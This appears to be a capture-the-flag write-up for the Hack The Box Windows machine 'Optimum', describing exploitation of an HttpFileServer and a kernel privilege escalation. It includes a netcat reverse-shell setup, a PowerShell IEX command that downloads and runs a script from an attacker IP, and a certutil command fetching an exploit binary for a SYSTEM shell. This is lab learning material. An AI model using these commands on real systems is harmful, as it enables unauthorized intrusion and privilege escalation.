Buy me a tea

Hackthebox - Optimum

  • Windows

Optimum

Nmap

Port 80

  • We have an HttpFile Server httpFileServer

  • If we google it we find this exploit right away

  • We have to get nc.exe in our attacking machine. Kali has binaries hosted so we can just copy and paste it in our working dir like this cp /usr/share/windows-resources/binaries/nc.exe .

  • We have to serve netcat using python http server python3 -m http.server 80

  • Then we have to modify the script and add our ip address and our port (I left 443)

  • We set a listener rlwrap nc -lvp 443

  • We launch our exploit python2 39161 10.10.10.8 80

  • And we get a shell shell

  • We can grab the user flag user flag

Privesc

  • Win version

win version

Kernel exploits

  • echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -

Local privesc

  • Let's find another exploit than the one mentioned in Sherlock (does not work) searchsploit ms16-032

searchsploit

  • Tried a few exploits but none worked

  • On google I found this

  • And in the comment they mention this exe file

  • We download it in our kali

  • Serve it with python

  • certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe get it in our target

  • We launch it we get a system shell

system

  • We can grab the root flag

root
PreviousHackthebox - NibblesNextHackthebox - Paper

Last updated